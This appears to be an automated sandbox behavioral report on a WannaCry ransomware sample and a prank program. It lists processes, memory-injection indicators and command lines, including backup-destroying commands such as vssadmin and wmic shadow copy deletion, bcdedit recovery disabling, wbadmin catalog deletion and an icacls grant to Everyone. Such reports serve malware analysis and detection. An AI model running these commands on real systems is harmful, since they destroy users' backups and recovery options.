N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe N/A
N/A N/A C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe N/A
N/A N/A C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe N/A
N/A N/A C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe N/A
N/A N/A C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe N/A
N/A N/A C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe N/A
N/A N/A C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Windows\system32\LogonUI.exe N/A
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 164 wrote to memory of 3668 N/A C:\Program Files (x86)\Windows Media Player\wmplayer.exe C:\Program Files (x86)\Windows Media Player\setup_wm.exe
PID 164 wrote to memory of 3668 N/A C:\Program Files (x86)\Windows Media Player\wmplayer.exe C:\Program Files (x86)\Windows Media Player\setup_wm.exe
PID 164 wrote to memory of 3668 N/A C:\Program Files (x86)\Windows Media Player\wmplayer.exe C:\Program Files (x86)\Windows Media Player\setup_wm.exe
PID 164 wrote to memory of 4932 N/A C:\Program Files (x86)\Windows Media Player\wmplayer.exe C:\Windows\SysWOW64\unregmp2.exe
PID 164 wrote to memory of 4932 N/A C:\Program Files (x86)\Windows Media Player\wmplayer.exe C:\Windows\SysWOW64\unregmp2.exe
PID 164 wrote to memory of 4932 N/A C:\Program Files (x86)\Windows Media Player\wmplayer.exe C:\Windows\SysWOW64\unregmp2.exe
PID 4932 wrote to memory of 1124 N/A C:\Windows\SysWOW64\unregmp2.exe C:\Windows\System32\unregmp2.exe
PID 4932 wrote to memory of 1124 N/A C:\Windows\SysWOW64\unregmp2.exe C:\Windows\System32\unregmp2.exe
PID 2312 wrote to memory of 4584 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2312 wrote to memory of 4584 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2312 wrote to memory of 4584 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2312 wrote to memory of 4584 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2312 wrote to memory of 4584 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2312 wrote to memory of 4584 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2312 wrote to memory of 4584 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2312 wrote to memory of 4584 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2312 wrote to memory of 4584 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2312 wrote to memory of 4584 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2312 wrote to memory of 4584 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 1716 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 1716 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\shitting slander.mp4"

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\shitting slander.mp4"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Windows\System32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.0.1632826779\482042872" -parentBuildID 20221007134813 -prefsHandle 1700 -prefMapHandle 1516 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f372c4fc-e3e5-4b12-a97d-5439bbbc5097} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 1780 14ba62e6e58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.1.1011365000\1064549107" -parentBuildID 20221007134813 -prefsHandle 2108 -prefMapHandle 2104 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6255b330-1d12-40cd-9ccd-784d380abfd6} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 2136 14ba5e32f58 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.2.380441002\2121190577" -childID 1 -isForBrowser -prefsHandle 2868 -prefMapHandle 2864 -prefsLen 20866 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {568ccfb8-b9a0-494f-8314-053e9829b7c6} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 2880 14baa59bc58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.3.1910753217\1322760908" -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 3572 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3c6767c-0937-4f19-a67c-c9e66908780c} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 3588 14baabc2a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.4.754300354\1905143269" -childID 3 -isForBrowser -prefsHandle 3604 -prefMapHandle 3268 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f6a6ce6-0639-49b8-96dc-8a6ee2d21db2} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 3924 14babb30258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.5.1442828929\29876377" -childID 4 -isForBrowser -prefsHandle 4812 -prefMapHandle 4488 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c510274-ed65-493a-85dc-ca3d6dfa148e} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4824 14bac682b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.6.1307488610\724575438" -childID 5 -isForBrowser -prefsHandle 4964 -prefMapHandle 4968 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e92dc18-1361-467a-b7bb-2dd3ad95dfa7} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4956 14bad035858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.7.1889428556\905682613" -childID 6 -isForBrowser -prefsHandle 5160 -prefMapHandle 5164 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5df0c7d4-32d0-46ce-9d9b-23a65d4ce8f1} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 5152 14bad032858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.8.580235843\1059299835" -childID 7 -isForBrowser -prefsHandle 2648 -prefMapHandle 2644 -prefsLen 26328 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eec5f425-d64c-4c43-9f22-de0cda601af7} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 2660 14bae2dab58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.9.470533679\633976505" -childID 8 -isForBrowser -prefsHandle 4884 -prefMapHandle 4468 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ca88035-a5c5-494f-9bc4-9260af854c58} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4872 14b9b26a558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.10.1871038213\1190940077" -childID 9 -isForBrowser -prefsHandle 4600 -prefMapHandle 3944 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {374f9e5a-7806-4f1e-b94d-f8503db05a8a} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4816 14b9b22d558 tab

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.csproj.FileListAbsolute.txt

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.11.221279094\153739102" -childID 10 -isForBrowser -prefsHandle 6320 -prefMapHandle 6280 -prefsLen 26808 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {787e0501-1a3d-4753-870f-18343e84baee} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 6328 14baccd2558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.12.1332645582\1475824575" -childID 11 -isForBrowser -prefsHandle 5388 -prefMapHandle 6220 -prefsLen 26808 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {136114bf-28d2-49fc-bff6-0572fdde6c24} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 6292 14baecc1058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.0.820577293\2066161052" -parentBuildID 20221007134813 -prefsHandle 1612 -prefMapHandle 1600 -prefsLen 21145 -prefMapSize 233583 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8e31b9e-88cd-4cbb-89ca-5265a21f1fe3} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 1704 20920cfa758 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.1.393268130\312030324" -parentBuildID 20221007134813 -prefsHandle 1980 -prefMapHandle 1976 -prefsLen 21190 -prefMapSize 233583 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fbd7c12-8d71-43df-8433-2db82c44e0b6} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 2004 2090ebe6458 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.2.586240356\1866142644" -childID 1 -isForBrowser -prefsHandle 2712 -prefMapHandle 2708 -prefsLen 21651 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a4c3270-0384-4024-a211-fcfe7ce8d17d} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 2724 20924847958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.3.1393738457\1864504748" -childID 2 -isForBrowser -prefsHandle 3276 -prefMapHandle 2732 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3eb94f36-7a1e-4811-81e3-723e2dec2a85} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 3288 209259e9358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.4.243577776\1733291937" -childID 3 -isForBrowser -prefsHandle 4008 -prefMapHandle 4012 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a65a7575-5a9d-458b-8191-9ec1f07edd91} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 3984 20926bbdb58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.5.1286275282\66111482" -childID 4 -isForBrowser -prefsHandle 4548 -prefMapHandle 4544 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {acdfb0a5-814c-443e-b80d-fdca19bc23a2} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4572 2092795b758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.6.217863551\953537729" -childID 5 -isForBrowser -prefsHandle 4712 -prefMapHandle 4716 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eecc973b-01b7-4e54-8c6b-f11cd18198ce} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4704 2092795c358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.7.695365373\1592387224" -childID 6 -isForBrowser -prefsHandle 4904 -prefMapHandle 4908 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7451cbf-e91b-4112-8eee-e9e36558cd1a} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4896 2092795cc58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.8.650729503\1253576218" -childID 7 -isForBrowser -prefsHandle 3812 -prefMapHandle 4232 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48aa7dc7-de7e-43b3-900a-e11449a13639} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4176 209281c8558 tab

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 257181729107569.bat

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

@[email protected] co

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b @[email protected] vs

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

@[email protected] vs

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\TaskData\Tor\taskhsvc.exe

TaskData\Tor\taskhsvc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe

taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

